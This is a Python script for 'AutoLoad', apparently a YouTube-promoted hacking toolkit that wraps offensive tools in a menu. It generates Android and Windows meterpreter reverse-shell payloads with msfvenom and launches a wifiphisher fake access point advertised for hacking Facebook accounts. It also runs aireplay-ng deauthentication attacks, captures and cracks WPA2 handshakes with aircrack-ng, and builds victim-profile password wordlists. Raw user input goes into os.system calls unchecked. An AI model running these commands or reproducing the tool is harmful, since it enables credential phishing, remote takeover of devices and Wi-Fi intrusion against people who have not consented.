#!/usr/bin/env python
from __future__ import print_function
from __future__ import absolute_import
import colorama
from colorama import Fore
import os
import sys
import pygeoip
import requests
import httplib
import socket
import loading
managed=open('/usr/share/managed.txt').read()
monitor=open('/usr/share/monitor.txt').read()
helpi=open('/usr/share/help.txt').read()
os.system('resize -s 19 92')
os.system('clear')
print(Fore.GREEN +"                        Welcome to                   |::::::Follow Me on::::::")
print(Fore.GREEN +"         _         _        _     ___            _   |"+Fore.RED +"::::::::YouTube:::::::::") 
print(Fore.GREEN +"        / \  _   _| |_ ___ | |   / _ \  __ _  __| |  |"+Fore.WHITE+"https://www.youtube.com/Majorhacker")
print(Fore.GREEN +"       / _ \| | | | __/ _ \| |  | | | |/ _` |/ _` |  |"+Fore.YELLOW +"::::::::Website:::::::::")
print(Fore.GREEN +"      / ___ \ |_| | || (_) | |__| |_| | (_| | (_| |  |"+Fore.WHITE +"http://majorhacke.blogspot.com/")
print(Fore.GREEN +"     /_/   \_\__,_|\__\___/|_____\___/ \__,_|\__,_|  |"+Fore.BLUE +"::::::::Facebook::::::::")
print(Fore.GREEN +"                Automatic Your Proccess              |"+Fore.WHITE +"http://facebook.com/majorhacke ")
print(Fore.GREEN +"                       [created by Nafis] ["+Fore.WHITE +"V1.2"+Fore.GREEN +"]     |")
print(Fore.GREEN +"====================================================================================")
#------------------------------------------------------------------------------------------------------------------------------------------------------------
#------------------------------------------------------------------------------------------------------------------------------------------------------------
def check_internet():
    test_con="www.google.com"
    test_res="/intl/en/policies/privacy/"
    test=httplib.HTTPConnection(test_con)
    try:
        test.request("GET",test_res)
        response=test.getresponse()
    except httplib.ResponseNotReady as e:
        print("Improper Connection State")
    except socket.gaierror as e:
        print("Not Connected to the Internet")
        print("Internet Required")
        user_input=raw_input(Fore.YELLOW +"Press Any key to Go back...")
        import Autoload
    else:
        print(Fore.GREEN +"Connected")
        
#------------------------------------------------------------------------------------------------------------------------------------------------------------
def payloads():
    def android():
        os.system('clear')
        print(Fore.GREEN +"[*]:::::: Payload Creator ::::::")
        print("")
        print("[]Create Payload For Android")
        print("")
        print("[*]Enter the IP and PORT you want to Listen on ")
        print("")
        ip=raw_input(Fore.BLUE +"[IP:] > ")
        port=raw_input("[PORT:] > ")
        name=raw_input("[Name of the File:] > ")
        path=raw_input("File Save to[add '/' in the end]: ")
        print("Payload is going to Saved in " +path+name+ ".apk")
        print("[]Generating...........")
        os.system('msfvenom -p android/meterpreter/reverse_tcp --platform android LHOST=' +ip+ ' LPORT=' +port+ ' -o'+path+name+ '.apk')
        print("")
        print("Done..")
        os.system('clear')
        import Autoload
        
    def windows():
        os.system('clear')
        print(Fore.GREEN +"[*]:::::: Payload Creator ::::::")
        print("")
        print("[]Create Payload For Windows")
        print("")
        print("[*]Enter the IP and PORT you want to Listen on ")
        print("")
        ip=raw_input(Fore.BLUE +"[IP:] > ")
        port=raw_input("[PORT:] > ")
        name=raw_input("[Name of the File:] > ")
        path=raw_input("File Save to[add '/' in the end]: ")
        print("Payload is going to Saved in " +path+name+ ".exe")
        print("[]Generating...........")
        os.system('msfvenom -p windows/meterpreter/reverse_tcp --platform windows LHOST=' +ip+ ' LPORT=' +port+ ' -o' +path+name+'.exe')
        print("")
        print("Done..")
        os.system('clear')
        import Autoload
    def user_inputpay():
        print(Fore.GREEN +"[*]:::::: Payload Creator ::::::")
        print("")
        print(Fore.BLUE +"1.) Create a Android payload")
        print("2.) Create a Windows payload")
        print("3.) Back")
        print("4.) Exit")
        print("")
        while True:
            userpay=input(Fore.BLUE +"[autoload:] > ")
            if userpay == 1:
                android()
            elif userpay == 2:
                windows()
            elif userpay == 3:
                import Autoload
            elif userpay == 4:
                print("")
                print(Fore.GREEN +"Thanks For Using AutoLoad")
                sys.exit()
            else:
                print(Fore.RED +"Wrong Choice")
    os.system('clear')
    user_inputpay()
#------------------------------------------------------------------------------------------------------------------------------------------------------------
def helppp():
    os.system('clear')
    print("")
    print(Fore.GREEN +"[..Example..]")
    print("")
    print(Fore.BLUE +"IP: 192.168.43.1")
    print("PORT: 4444")
    print("Name of the File: payload")
    print("File Save to[add '/' in the end]: /root/payload/")
    print("")
    user_input=raw_input(Fore.YELLOW +"Press Any key to Go back...")
    os.system('clear')
    import Autoload
#------------------------------------------------------------------------------------------------------------------------------------------------------------
def fakeap():
    os.system('clear')
    print(Fore.GREEN +"[*]::::::Create a Fake AP to Hack Facebook Account::::::")
    print("")
    ap=raw_input(Fore.BLUE +"[Enter the name of the AP:] > ")
    print("[]Creating............")
    os.system('xterm -geometry 60x15+0+999999 -e wifiphisher  --essid ' +ap+ ' -p oauth-login')
    print("Done..")
    os.system('clear')
    import Autoload
#-------------------------------------------------------------------------------------------------------------------------------------------------------------
def deauth():
    def single():
        os.system('clear')
        print("")
        print(Fore.GREEN +"[*] Disconnect Single Client[Effective/Recommanded]")
        print("")
        print("[Just copy and paste the essid]")
        print("")
        apmac=raw_input(Fore.BLUE +"[Enter the AP Essid(MAC):] > ")
        print("")
        cmac=raw_input("[Enter the Client's MAC:] > ")
        print("")
        packet=raw_input("[packets to send:] > ")
        os.system('xterm -geometry 60x15+0+999999 -e aireplay-ng --deauth '+packet+ ' -a ' +apmac+ ' -c ' +cmac +' '+ monitor)
        os.system('clear')
        user_input()
    def allcl():
        os.system('clear')
        print("")
        print(Fore.GREEN +"[*] Disconnect All Client[Less Effective")
        print("")
        print("[Just copy and paste the essid]")
        print("")
        apmac=raw_input(Fore.BLUE +"[Enter the AP Essid(MAC):] > ")
        print("")
        packets=raw_input("[packets to send:] > ")
        os.system('xterm -geometry 60x15+0+999999 -e aireplay-ng --deauth '+packets+ ' -a ' +apmac+' '+ monitor)
        os.system('clear')
        user_input()
    def user_input():
        print(Fore.GREEN +"[*]:::::: Disconnect Client From there AP ::::::")
        print("")
        print(Fore.BLUE +"1.) Disconnect Single Client[Effective/Recommanded]")
        print("2.) Disconnect All Client[Less Effective]")
        print("3.) Scan ")
        print("4.) Enable Moniter Mode")
        print("5.) Disable Moniter Mode")
        print("6.) Back")
        print("7.) Exit")
        print("")
        while True:
            userif=input(Fore.BLUE +"[autoload:] > ")
            if userif == 1:
                single()
            elif userif == 2:
                allcl()
            elif userif == 3:
                os.system('clear')
                os.system('gnome-terminal --window  -- airodump-ng '+monitor)
                deauth()
            elif userif == 4:
                os.system('airmon-ng start '+managed)
                print("Done..")
                deauth()
            elif userif == 5:
                os.system('airmon-ng stop '+monitor)
                print("Done..")
                deauth()
            elif userif == 6:
                os.system('clear')
                import Autoload
            elif userif == 7:
                print("")
                print("Thanks For Using AutoLoad")
                sys.exit()
            else:
                print("Wrong Choice")
    os.system('clear')
    user_input()
#------------------------------------------------------------------------------------------------------------------------------------------------------------ 
def check_ip():
    os.system('clear')
    check_internet()
    print("[]Please wait....")
    print("Your Public IP is: ")
    public_ip=os.system('curl -s ipinfo.io/ip')
    print("")
    user_input=raw_input(Fore.YELLOW +"Press Any key to Go back...")
    import Autoload
#------------------------------------------------------------------------------------------------------------------------------------------------------------
def brute_force():
    os.system('clear')
    print("[*]::::::Cracking Wpa2 Handshake File using Dictinoary Attack::::::")
    print("")
    handsak=raw_input("[Select HandShake File:] > ")
    print("")
    wordlist=raw_input("[Select WordList File:] > ")
    os.system('clear')
    print("[*]Cracking...........")
    os.system('aircrack-ng ' + handsak+ ' -w ' + wordlist)
    print("")
    userif = ''
    while not(userif == 'B' or userif == 'E'):
        userif=raw_input("[Type [b] Back or [e] Exit:] > ").upper()
        if userif == 'B':
            import Autoload
        elif userif == 'E':
            print("")
            print("Thanks For Using AutoLoad")
            sys.exit()
        else:
            print(Fore.RED +"Try Again")
        
    
def victim():
    os.system('clear')
    print("")
    print(Fore.GREEN +"[*]::::::Create a Victim info Based Wordlist using Cupp::::::")
    print("")
    print(Fore.BLUE +"1.) Create a Wordlist")
    print("")
    print("2.) Download huge wordlists from repository ")
    print("")
    userif = ''
    while not(userif == '1' or userif == '2'):
        userif=raw_input("[autoload:] > ")
        if userif == '1':
            os.system('clear')
            os.system('python /usr/share/cupp.py -i')
            print(Fore.GREEN +"File Saved to /root/AutoLoad/ ")
            print("")
            userrr=raw_input(Fore.YELLOW +"press any key to go back...")
            os.system('autoload')
        elif userif == '2':
            os.system('clear')
            os.system('python /usr/share/cupp.py -l')
            
        else:
            print(Fore.RED +"Try Again")
            print(Fore.BLUE)
        
    
def capturehand():
    os.system('clear')
    print("")
    print(Fore.GREEN +"[*]::::::Capture WPA-WPA2 Handshake::::::")
    print("")
    print(Fore.BLUE +"1.) Scan for Available Network")
    print("2.) Select Target and start capturing")
    print("3.) Enable Monitor Mode")
    print("4.) Disable Monitor Mode")
    print("5.) Back")
    print("6.) Exit")
    print("")

    def startcap():
        try:
            os.system('clear')
            print("")
            print(Fore.GREEN +"[*]::::::Start Capturing WPA-WPA2 Handshake::::::")
            print("     [Just copy and paste the essid]")
            print("")
            apmac=raw_input(Fore.BLUE +"[Enter the AP Essid(MAC):] > ")
            print(Fore.YELLOW +"                                                please close the scan terminal before hitting enter!")
            channel=raw_input(Fore.BLUE +"[Enter the channel number:] > ")
            print("")
            print(Fore.YELLOW +"press ctrl-c when you see [ WPA handshake:] on the terminal")
            print("File is storing in /root/AutoLoad/handshake")
            os.system('gnome-terminal --window  -- airodump-ng --bssid '+apmac+' --channel '+channel+' --write /root/AutoLoad/handshakes/handshake ' +monitor)
            print("")
            cmac=raw_input(Fore.BLUE +"[Enter the Client's MAC:] > ")
            os.system('clear')
            os.system('xterm -geometry 60x15+0+999999 -e aireplay-ng --deauth 20 -a ' +apmac+ ' -c ' +cmac +' '+ monitor)
            os.system('clear')
        except KeyboardInterrupt:
            print("")
            print(Fore.GREEN +"Thanks For Using AutoLoad!")
            sys.exit()
    userif = ''
    while not(userif == '1' or userif == '2'):
        userif=raw_input("[autoload:] > ")
        if userif == '1':
            os.system('clear')
            os.system('gnome-terminal --window  -- airodump-ng '+monitor)
            capturehand()
        elif userif == '2':
            startcap()
            capture_hand()
        elif userif == '3':
            os.system('airmon-ng start '+managed)
            print("Done..")
            capturehand()
        elif userif == '4':
            os.system('airmon-ng stop '+monitor)
            print("Done..")
            capturehand()
        elif userif == '5':
            os.system('clear')
            import Autoload
        elif userif == '6':
            print("")
            print("Thanks For Using AutoLoad")
            sys.exit()
        else:
            print("Wrong Choice")
            os.system('clear')
            capture_hand()
    
def nmaps():
    os.system('clear')
    print("")
    print(Fore.GREEN +"[*]::::::Scan Hosts using nmap::::::")
    print("")
    print(Fore.BLUE +"1.) Discover Hosts")
    print("")
    print("2.) Select Target")
    print("3.) Normal Scan on Target")
    print("4.) Ping Scan on Target")
    print("5.) Intense Scan Target")
    print("6.) Service/version Scan on Target")
    print("7.) OS detection on Target")
    print("")
    print("8.) Back")
    print("9.) Exit")
    userif = ''
    while True:
        print("")
        userif=raw_input("[autoload:] > ")
        if userif == '1':
            os.system('clear')
            print("EX.[all host] - 192.168.43.1-255")
            print("EX.[Single Host] - 192.168.43.55")
            print("")
            rang=raw_input("[Specify Range to scan:] >")
            os.system('nmap '+rang)
            userrr=raw_input(Fore.YELLOW +"press any key to go back...")
            nmaps()
        elif userif == '2':
            os.system('clear')
            print("")
            print("")
            targ=raw_input("[Select target:] >")
            os.system('echo '+targ+' > /root/AutoLoad/target | touch /root/AutoLoad/target')
            nmaps()
        elif userif == '3':
            try:
                target=open('/root/AutoLoad/target').read()
                print(Fore.GREEN +":::::::NORMAL SCAN::::::")
                print("")
                print(Fore.YELLOW +"[] Scanning..........")
                print(Fore.GREEN)
                os.system('nmap '+target)
                print("")
                userrr=raw_input(Fore.YELLOW +"press any key to go back...")
                nmaps()
            except IOError:
                print(Fore.RED +"Please Select a Target First!!!")
                userrr=raw_input(Fore.YELLOW +"press any key to go back...")
                nmaps()
            else:
                os.system('nmap '+target)
        elif userif == '4':
            try:
                target=open('/root/AutoLoad/target').read()
                print(Fore.GREEN +":::::::PING SCAN::::::")
                print("")
                print(Fore.YELLOW +"[] Scanning..........")
                print(Fore.GREEN)
                os.system('nmap '+target+' -sn')
                print("")
                userrr=raw_input(Fore.YELLOW +"press any key to go back...")
                nmaps()
            except IOError:
                print(Fore.RED +"Please Select a Target First!!!")
                userrr=raw_input(Fore.YELLOW +"press any key to go back...")
                nmaps()
            else:
                os.system('nmap '+target+' -sn')
        elif userif == '5':
            try:
                target=open('/root/AutoLoad/target').read()
                print(Fore.GREEN +":::::::INTENSE SCAN::::::")
                print("")
                print(Fore.YELLOW +"[] Scanning..........")
                print(Fore.GREEN)
                os.system('nmap -T4 -A -v '+target)
                print("")
                userrr=raw_input(Fore.YELLOW +"press any key to go back...")
                nmaps()
            except:
                print(Fore.RED +"Please Select a Target First!!!")
                userrr=raw_input(Fore.YELLOW +"press any key to go back...")
                nmaps()
            else:
                os.system('nmap -T4 -A -v '+target)
        elif userif == '6':
            try:
                target=open('/root/AutoLoad/target').read()
                print(Fore.GREEN +":::::::Service and Version Detection::::::")
                print("")
                print(Fore.YELLOW +"[] Scanning..........")
                print(Fore.GREEN)
                os.system('nmap '+target+' -sV')
                print("")
                userrr=raw_input(Fore.YELLOW +"press any key to go back...")
                nmaps()
            except:
                print(Fore.RED +"Please Select a Target First!!!")
                userrr=raw_input(Fore.YELLOW +"press any key to go back...")
                nmaps()
            else:
                os.system('nmap '+target+' -sV')
        elif userif == '7':
            try:
                target=open('/root/AutoLoad/target').read()
                print(Fore.GREEN +":::::::Operating System Detection::::::")
                print("")
                print(Fore.YELLOW +"[] Scanning..........")
                print(Fore.GREEN)
                os.system('nmap '+target+' -O')
                print("")
                userrr=raw_input(Fore.YELLOW +"press any key to go back...")
                nmaps()
            except:
                print(Fore.RED +"Please Select a Target First!!!")
                userrr=raw_input(Fore.YELLOW +"press any key to go back...")
                nmaps()
            else:
                os.system('nmap '+target+' -O')
        elif userif == '8':
            os.system('clear')
            import Autoload
        elif userif == '9':
            print("")
            print(Fore.GREEN +"Thanks For Using AutoLoad")
            sys.exit()
        else:
            print(Fore.RED +"Try Again")
            print(Fore.BLUE)    
#------------------------------------------------------------------------------------------------------------------------------------------------------------        
print("")
print("|1.)"+Fore.WHITE +" Create Payload       "+Fore.GREEN +"|5.)"+Fore.WHITE +" GeoLocate an IP "+Fore.GREEN +      "     |11.)"+Fore.WHITE +" Nmap Scan")
print(Fore.GREEN +"|2.)"+Fore.WHITE +" Create a Wordlist    "+Fore.GREEN +"|6.)"+Fore.WHITE +" View Public IP  "+Fore.GREEN +  "     |22.)"+Fore.WHITE +" Help")
print(Fore.GREEN +"|3.)"+Fore.WHITE +" Create Fake AP       "+Fore.GREEN +"|7.)"+Fore.WHITE +" Crack Wpa2 HandShake"+Fore.GREEN + " |33.)"+Fore.WHITE +" Update  ")
print(Fore.GREEN +"|4.)"+Fore.WHITE +" Deauth Attack        "+Fore.GREEN +"|8.)"+Fore.WHITE +" Capture Handshake  "+Fore.GREEN + "  |55.)"+Fore.WHITE +" Exit")
print("")
while True:
    try:
        user=input(Fore.BLUE +"[autoload] > ")
        if user == 1:
            payloads()
        elif user == 2:
            victim()
        elif user == 11:
            nmaps()
        elif user == 33:
            check_internet()
            os.system('python /usr/share/updater.py')
        elif user == 3:
            fakeap()
        elif user == 4:
            deauth()
        elif user == 5:
            check_internet()
            os.system('clear')
            print("[*]::::::GeoLocate An IP Address::::::")
            print("")
            os.system('bash /usr/share/geoip.sh')
            import Autoload
        elif user == 6:
            check_ip()
        elif user == 7:
            brute_force()
        elif user == 22:
            print(helpi)
        elif user == 'clear':
            os.system('clear')
        elif user == 8:
            capturehand()
        elif user == 55:
            print("")
            print(Fore.GREEN +"Thanks for using AutoLOad")
            print("Goodbye!!")
            print(Fore.RED +"Don't Forget to Subscribe my YouTube Channel..")
            print("")
            sys.exit()
        else:
            print(Fore.RED +"Wrong Choice")
        continue
    except KeyboardInterrupt:
        print("")
        print(Fore.GREEN +"Thanks For Using AutoLoad!")
        sys.exit()
    except SyntaxError:
        import Autoload




    
                                              
